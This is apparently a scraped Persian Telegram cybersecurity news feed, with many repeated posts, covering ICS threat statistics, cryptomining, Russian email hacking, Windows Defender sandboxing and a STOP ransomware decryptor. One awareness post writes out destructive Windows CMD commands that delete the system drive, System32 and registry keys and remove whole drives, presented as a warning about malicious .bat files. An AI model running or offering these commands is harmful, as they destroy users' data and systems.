سایت مرکز لرزهنگاری کشوری دانشگاه تهران به آدرس http://irsc.ut.ac.ir/ آلوده به اسکریپت استخراج رمز ارز مبتنی بر مرورگر است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
کتاس درنظر دارد لیست سایتهای که ماین غیرقانونی میکنند را افشا کند
اطفا دراین امر مارا یاری کنید
با ارسال مستندات لازم.
#ماین_غیرقانونی
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
اطفا دراین امر مارا یاری کنید
با ارسال مستندات لازم.
#ماین_غیرقانونی
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
Forwarded from IACS (Pedram Kiani)
چه کسانی امکانات و تجهیزات ICS را هدف قرار می دهند و چطور؟
چشم انداز تهدید ICS
تعداد حملات سایبری به سیستم های کنترل صنعتی به سرعت در حال افزایش است. بازیگران دولتی، مجرمان سایبری و هکوتیست ها آنها را تهدید می کنند. در ماه سپتامبر، کارشناسان امنیتی آزمایشگاه کسپرسکی گزارشی با عنوان «چشم انداز تهدید برای سیستم های اتوماسیون صنعتی» را برای سال های 2018 منتشر کردند که شامل اطلاعات مربوط به حملات علیه سیستم های ICS در شش ماه اول سال می شود. تعداد نمونه های مخرب که توسط Kaspersky تشخیص داده شده است بیش از 19،400 است و متعلق به حدود 2800 خانواده مخرب است که اکثر آنها تهدیدی خاص برای این دسته از دستگاه ها نیست. کارشناسان نشان دادند که اکثر آلودگی ها ناشی از حملات تصادفی است.
براساس گزارش Kaspersky، تعداد حملات علیه سیستم های ICS که توسط این شرکت محافظت می شود، به 41.2 درصد رسید. در مقایسه با نیمه اول سال 2017، کارشناسان میزان افزایش مجموعی تعداد عملیات حمله را 5 درصد اعلام کردند.
بیشتر حملات سیستم کامپیوتری را در کشورهایی که تولید ناخالص داخلی سرانه در آسیا، آمریکای لاتین و شمال آفریقا کم است، در حالی که در ایالات متحده تنها 21.4 درصد از سیستم های ICS را تحت تاثیر قرار داد،
با این حال، چندین منطقه از حملات مکرر و مخرب به سیستم های کنترل صنعتی خود رنج می بردند. در جنوب شرقی آسیا، بیش از 60 درصد ICS در نیمه اول سال 2018 مورد حمله قرار گرفتند؛ آفریقا در حدود 60 درصد از ICS مورد حمله قرار گرفت، با جنوب آسیا حدود 55 درصد، آسیای مرکزی حدود 53 درصد و روسیه 45 درصد است.
توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی نشان داد که کشورهایی که بیشترین تعداد حملات را به ترتیب درصد ویتنام (75.1 درصد)، الجزایر (71.6 درصد) و مراکش (65 درصد)، در حالی که امن ترین مناطق برای سیستم های ICS، دانمارک بود 14 درصد)، ایرلند (14.4 درصد) و سوئیس (15.9 درصد).
در حالی که بیشتر حملات از اینترنت بود، 27 درصد از حملات از منابع وب، 8.4 درصد از رسانه های قابل حمل قابل حمل استفاده می شد و فقط 3.8 درصد از مشتریان ایمیل بود.
"این الگو به نظر منطقی می رسد: شبکه های صنعتی مدرن به سختی می توانند از سیستم های خارجی جدا شوند. امروز، رابط کاربری بین شبکه صنعتی و شبکه شرکتی برای کنترل پروسس های صنعتی و مدیریت شبکه ها و سیستم های صنعتی مورد نیاز است.
در سال 2011، مهاجمان از وب سایت های قانونی برای میزبانی اجزای مخرب در آنها استفاده می کردند. محققان افزایش درصد رایانه های ICS که از طریق مرورگرها مورد حمله قرار گرفتند، به افزایش تعداد حملات که شامل معدنچیان cryptocurrency جاوااسکریپت بودند.
کارشناسان همچنین اشاره کردند که افزایش تعداد حملات با استفاده از اسناد مایکروسافت آفیس به عنوان بردار حمله (ورد، اکسل، RTF، پاورپوینت، Visio و غیره) همراه با کمپین های فیشینگ بود.
"محققان کسپرسکی در این گزارش اظهار داشتند:" در سال 2011، بازیگران تهدید به حمله به وب سایت های قانونی که آسیب پذیری در برنامه های وب خود را داشتند، برای میزبانی ابزارهای مخرب در این وب سایت ها ادامه یافت. " به طور مشخص، افزایش تعداد رایانه های ICS که از طریق مرورگرها در سال 2018 به طول انجامید، به دلیل افزایش تعداد حملات که شامل cryptocurrency جاوااسکریپت بود، افزایش یافت. در عین حال، افزایش تعداد کامپیوترهای ICS با استفاده از اسناد مایکروسافت آفیس با امواج ایمیل های فیشینگ همراه بود. "
اطلاعات بیشتر در مورد حملات علیه سیستم های ICS در سال 2018 H1 در نسخه کامل این گزارش موجود است.
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
چشم انداز تهدید ICS
تعداد حملات سایبری به سیستم های کنترل صنعتی به سرعت در حال افزایش است. بازیگران دولتی، مجرمان سایبری و هکوتیست ها آنها را تهدید می کنند. در ماه سپتامبر، کارشناسان امنیتی آزمایشگاه کسپرسکی گزارشی با عنوان «چشم انداز تهدید برای سیستم های اتوماسیون صنعتی» را برای سال های 2018 منتشر کردند که شامل اطلاعات مربوط به حملات علیه سیستم های ICS در شش ماه اول سال می شود. تعداد نمونه های مخرب که توسط Kaspersky تشخیص داده شده است بیش از 19،400 است و متعلق به حدود 2800 خانواده مخرب است که اکثر آنها تهدیدی خاص برای این دسته از دستگاه ها نیست. کارشناسان نشان دادند که اکثر آلودگی ها ناشی از حملات تصادفی است.
براساس گزارش Kaspersky، تعداد حملات علیه سیستم های ICS که توسط این شرکت محافظت می شود، به 41.2 درصد رسید. در مقایسه با نیمه اول سال 2017، کارشناسان میزان افزایش مجموعی تعداد عملیات حمله را 5 درصد اعلام کردند.
بیشتر حملات سیستم کامپیوتری را در کشورهایی که تولید ناخالص داخلی سرانه در آسیا، آمریکای لاتین و شمال آفریقا کم است، در حالی که در ایالات متحده تنها 21.4 درصد از سیستم های ICS را تحت تاثیر قرار داد،
با این حال، چندین منطقه از حملات مکرر و مخرب به سیستم های کنترل صنعتی خود رنج می بردند. در جنوب شرقی آسیا، بیش از 60 درصد ICS در نیمه اول سال 2018 مورد حمله قرار گرفتند؛ آفریقا در حدود 60 درصد از ICS مورد حمله قرار گرفت، با جنوب آسیا حدود 55 درصد، آسیای مرکزی حدود 53 درصد و روسیه 45 درصد است.
توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی نشان داد که کشورهایی که بیشترین تعداد حملات را به ترتیب درصد ویتنام (75.1 درصد)، الجزایر (71.6 درصد) و مراکش (65 درصد)، در حالی که امن ترین مناطق برای سیستم های ICS، دانمارک بود 14 درصد)، ایرلند (14.4 درصد) و سوئیس (15.9 درصد).
در حالی که بیشتر حملات از اینترنت بود، 27 درصد از حملات از منابع وب، 8.4 درصد از رسانه های قابل حمل قابل حمل استفاده می شد و فقط 3.8 درصد از مشتریان ایمیل بود.
"این الگو به نظر منطقی می رسد: شبکه های صنعتی مدرن به سختی می توانند از سیستم های خارجی جدا شوند. امروز، رابط کاربری بین شبکه صنعتی و شبکه شرکتی برای کنترل پروسس های صنعتی و مدیریت شبکه ها و سیستم های صنعتی مورد نیاز است.
در سال 2011، مهاجمان از وب سایت های قانونی برای میزبانی اجزای مخرب در آنها استفاده می کردند. محققان افزایش درصد رایانه های ICS که از طریق مرورگرها مورد حمله قرار گرفتند، به افزایش تعداد حملات که شامل معدنچیان cryptocurrency جاوااسکریپت بودند.
کارشناسان همچنین اشاره کردند که افزایش تعداد حملات با استفاده از اسناد مایکروسافت آفیس به عنوان بردار حمله (ورد، اکسل، RTF، پاورپوینت، Visio و غیره) همراه با کمپین های فیشینگ بود.
"محققان کسپرسکی در این گزارش اظهار داشتند:" در سال 2011، بازیگران تهدید به حمله به وب سایت های قانونی که آسیب پذیری در برنامه های وب خود را داشتند، برای میزبانی ابزارهای مخرب در این وب سایت ها ادامه یافت. " به طور مشخص، افزایش تعداد رایانه های ICS که از طریق مرورگرها در سال 2018 به طول انجامید، به دلیل افزایش تعداد حملات که شامل cryptocurrency جاوااسکریپت بود، افزایش یافت. در عین حال، افزایش تعداد کامپیوترهای ICS با استفاده از اسناد مایکروسافت آفیس با امواج ایمیل های فیشینگ همراه بود. "
اطلاعات بیشتر در مورد حملات علیه سیستم های ICS در سال 2018 H1 در نسخه کامل این گزارش موجود است.
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Telegram
IACS
کانال تخصصی امنیت اتوماسیون و کنترل صنعتی با رویکرد آگاهی رسانی،آموزش ومشاوره درحوزه مخاطرات امنیتی درزیرساختهای حساس وحیاتی بامعماری:ICS، SCADA، DCS، OT فعالیت میکند.
برای اخذ مشاوره خصوصی بامن تماس بگیرید:
@Pedram_kiani
www.VCOACH.ir
برای اخذ مشاوره خصوصی بامن تماس بگیرید:
@Pedram_kiani
www.VCOACH.ir
Forwarded from IACS (Pedram Kiani)
شکل 1: توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی، H1 2018، درصد کامپیوترهای ICS مورد حمله در هر کشوری (منبع: آزمایشگاه کسپرسکی)
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Forwarded from IACS (Pedram Kiani)
شکل 2: منابع اصلی تهدیدهای مسدود شده در رایانه های ICS (درصد رایانه های مورد حمله طی دوره های نیم سال) (منبع: آزمایشگاه کسپرسکی)
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
هک ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان
آژانس امنیت داخلی آلمان اعلام کرده است که ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان، هدف حمله هکرهای روسی قرار گرفته است. در ماه اکتبر نیز مقامات آلمانی اعلام کردند که حمله سایبری 2017 به وزارت خارجه آلمان توسط هکرهای روسی انجام گرفته است. اشپیگل نیز اعلام کرد که مقامات مبارزه با حملات سایبری آلمان اعلام کردند که حملات جدیدی علیه برخی دستگاههای این کشور انجام شده است که اکثر این حملات در چهاردهم نوامبر انجام گرفته ولی هنوز مشخص نیست که چه اطلاعاتی براساس این حملات مورد هدف بوده است. با این حال سخنگوی کرملین اعلام کرد که روسیه هیچگونه دخالتی در امور کشورهای دیگر ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
آژانس امنیت داخلی آلمان اعلام کرده است که ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگیهای دیپلماتیک آلمان، هدف حمله هکرهای روسی قرار گرفته است. در ماه اکتبر نیز مقامات آلمانی اعلام کردند که حمله سایبری 2017 به وزارت خارجه آلمان توسط هکرهای روسی انجام گرفته است. اشپیگل نیز اعلام کرد که مقامات مبارزه با حملات سایبری آلمان اعلام کردند که حملات جدیدی علیه برخی دستگاههای این کشور انجام شده است که اکثر این حملات در چهاردهم نوامبر انجام گرفته ولی هنوز مشخص نیست که چه اطلاعاتی براساس این حملات مورد هدف بوده است. با این حال سخنگوی کرملین اعلام کرد که روسیه هیچگونه دخالتی در امور کشورهای دیگر ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
رشد حملات پردازش رایانهها و سرقت دادهها
اقدامات متقلبانه مربوط به جرائم سوءاستفاده از رایانه، در طول یک دوره چهار درصد افزایش داشته که این امر به علت افزایش ۴۲ درصدی در مورد هک، رسانههای اجتماعی و ایمیل است. مدیر امنیت سایبری در شرکت Redscan، گفته که بعضی از یافتهها را جدی نگیرید. ما نمیتوانیم این واقعیت را نادیده بگیریم که به دلایل متعددی، بسیاری از جنایات دیجیتال گزارششده است. در بسیاری از موارد، شناسایی فعالیتهای جنایی مانند فیشینگ دشوار است و اکثراً مردم بیاطلاع از قربانی شدن هستند و توضیح میدهد که حملاتی که مجرمان توانایی پردازش رایانهها را داشته و دادهها را برای برداشتن ارز دیجیتال به سرقت میبرند، همچنان بهطور فزایندهای در حال افزایش است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
اقدامات متقلبانه مربوط به جرائم سوءاستفاده از رایانه، در طول یک دوره چهار درصد افزایش داشته که این امر به علت افزایش ۴۲ درصدی در مورد هک، رسانههای اجتماعی و ایمیل است. مدیر امنیت سایبری در شرکت Redscan، گفته که بعضی از یافتهها را جدی نگیرید. ما نمیتوانیم این واقعیت را نادیده بگیریم که به دلایل متعددی، بسیاری از جنایات دیجیتال گزارششده است. در بسیاری از موارد، شناسایی فعالیتهای جنایی مانند فیشینگ دشوار است و اکثراً مردم بیاطلاع از قربانی شدن هستند و توضیح میدهد که حملاتی که مجرمان توانایی پردازش رایانهها را داشته و دادهها را برای برداشتن ارز دیجیتال به سرقت میبرند، همچنان بهطور فزایندهای در حال افزایش است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
بخشهای حساس در حوزه امنیت سایبری
بخشهای حساس در حوزه امنیت سایبری عبارتند از: مهاجمانی که فروشندگان سطح پایین زنجیره تامین را هدف قرار می دهند: مهاجمان سایبری الگوی حملات خود را تغییر داده اند. آن ها از اشخاص ثالث و رابع، برای ورود به سیستم های هدف استفاده می کنند. مجرمان سایبری، جاسوس ها و گروه های هکری همچنان به هدف قرار دادن فعالان زنجیره تامین، با هدف رسیدن به اهداف مالی و سیاسی خود، ادامه می دهند. حمله به زیرساخت های حیاتی: صنعت نفت و گاز، همچنان برای هکرها، یکی از اهداف بسیار محبوب به شمار می رود. حملات سایبری می توانند تاثیر قابل توجهی بر امنیت و اقتصاد تولید کنندگان و تامین کنندگان بخش انرژی داشته باشد. انگیزه های مالی حملات سایبری در حال افزایش هستند: گروه های هکری معروفی چون FIN7 و Cobalt Group، حملات سایبری خود را علیه موسسات مالی بزرگ و رستوران های زنجیره ای، افزایش داده اند. این گروه ها با به روزرسانی بدافزارهای خود، تهدیدی بزرگ به شمار می روند. رشد بدافزارها در قالب ابزار استخراج ارزهای دیجیتال: با توجه به افزایش اقبال جهانی به استخراج ارزهای رمزپایه، انتظار می رود که استفاده هکرها از تروجان های استخراج ارزهای دیجیتال نیز رشد قابل توجهی داشته باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
بخشهای حساس در حوزه امنیت سایبری عبارتند از: مهاجمانی که فروشندگان سطح پایین زنجیره تامین را هدف قرار می دهند: مهاجمان سایبری الگوی حملات خود را تغییر داده اند. آن ها از اشخاص ثالث و رابع، برای ورود به سیستم های هدف استفاده می کنند. مجرمان سایبری، جاسوس ها و گروه های هکری همچنان به هدف قرار دادن فعالان زنجیره تامین، با هدف رسیدن به اهداف مالی و سیاسی خود، ادامه می دهند. حمله به زیرساخت های حیاتی: صنعت نفت و گاز، همچنان برای هکرها، یکی از اهداف بسیار محبوب به شمار می رود. حملات سایبری می توانند تاثیر قابل توجهی بر امنیت و اقتصاد تولید کنندگان و تامین کنندگان بخش انرژی داشته باشد. انگیزه های مالی حملات سایبری در حال افزایش هستند: گروه های هکری معروفی چون FIN7 و Cobalt Group، حملات سایبری خود را علیه موسسات مالی بزرگ و رستوران های زنجیره ای، افزایش داده اند. این گروه ها با به روزرسانی بدافزارهای خود، تهدیدی بزرگ به شمار می روند. رشد بدافزارها در قالب ابزار استخراج ارزهای دیجیتال: با توجه به افزایش اقبال جهانی به استخراج ارزهای رمزپایه، انتظار می رود که استفاده هکرها از تروجان های استخراج ارزهای دیجیتال نیز رشد قابل توجهی داشته باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
افزودن حالت سندباکس به آنتیویروس ویندوز یا همان Windows Defender
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Microsoft Security Blog
Windows Defender Antivirus can now run in a sandbox | Microsoft Security Blog
Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox.
🚨هشدار‼️‼️‼️
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
-> حذف فایل مهم سیستمی "System32"
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00
-> حذف فایل مهم سیستمی "System32"
c:\WINDOWS\SYSTEM32\*.*/q
-> حذف تمامی ریجستری ها !OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
-> فرمت درایو ها (خودتون میتونید تغییرشون دهید)D:\
rd/s/q C:\
rd/s/q E:\👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
عرضه ابزار رمزگشایی نسخههای جدید باجافزار STOP
از اواخر هفته گذشته کاربران و موسسات ایرانی هدف نسخه Pumas باجافزار STOP قرار گرفتهاند.
خوشبختانه موسس سایت id-ransomware.malwarehunterteam.com با مشارکت یک محقق ایرانی موفق به ساخت ابزاری برای رمزگشایی فایلهای رمزگذاری شده توسط نسخههای Puma،و Pumas و Pumax این باجافزار مخرب شده است.
ابزار مذکور از طریق لینک زیر قابل دریافت و استفاده است:
https://download.bleepingcomputer.com/demonslay335/STOPDecrypter.zip
توضیح اینکه بهمنظور شناسایی کلید رمزگذاری نیاز است که یک فایل رمز شده توسط باجافزار به همراه فایل اصلی آن (رمزگذاری نشده) در مسیر Settings | Bruteforcer به نرمافزار معرفی شود. حجم این دو فایل معرفی شده میبایست حداقل 150 کیلوبایت باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
از اواخر هفته گذشته کاربران و موسسات ایرانی هدف نسخه Pumas باجافزار STOP قرار گرفتهاند.
خوشبختانه موسس سایت id-ransomware.malwarehunterteam.com با مشارکت یک محقق ایرانی موفق به ساخت ابزاری برای رمزگشایی فایلهای رمزگذاری شده توسط نسخههای Puma،و Pumas و Pumax این باجافزار مخرب شده است.
ابزار مذکور از طریق لینک زیر قابل دریافت و استفاده است:
https://download.bleepingcomputer.com/demonslay335/STOPDecrypter.zip
توضیح اینکه بهمنظور شناسایی کلید رمزگذاری نیاز است که یک فایل رمز شده توسط باجافزار به همراه فایل اصلی آن (رمزگذاری نشده) در مسیر Settings | Bruteforcer به نرمافزار معرفی شود. حجم این دو فایل معرفی شده میبایست حداقل 150 کیلوبایت باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
گویا یک شرکت #فینتک چینی برای ارائه #وام از مشتریانش عکس لختی! میخواهد تا در صورتی که نتوانید بازپرداخت کنید، آن را منتشر کند و اگر استمهال بخواهید بازهم باید ویدیو بفرستید!!
مصرفگرایی و بیاخلاقی با همدیگر به اندازه کافی خطرناک هستند چه برسد با فناوری
منبع:
https://www.vice.com/amp/en_au/article/kzv38w/millennials-in-china-are-using-nudes-to-secure-loans?__twitter_impression=true
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مصرفگرایی و بیاخلاقی با همدیگر به اندازه کافی خطرناک هستند چه برسد با فناوری
منبع:
https://www.vice.com/amp/en_au/article/kzv38w/millennials-in-china-are-using-nudes-to-secure-loans?__twitter_impression=true
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
بازی با زبان سرخ
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
افرادی که از طریق یوتیوب درآمد میلیونی دارند
مجله فوربس کانال هایی را که بیشترین درآمد دارند را مشخص کرد.
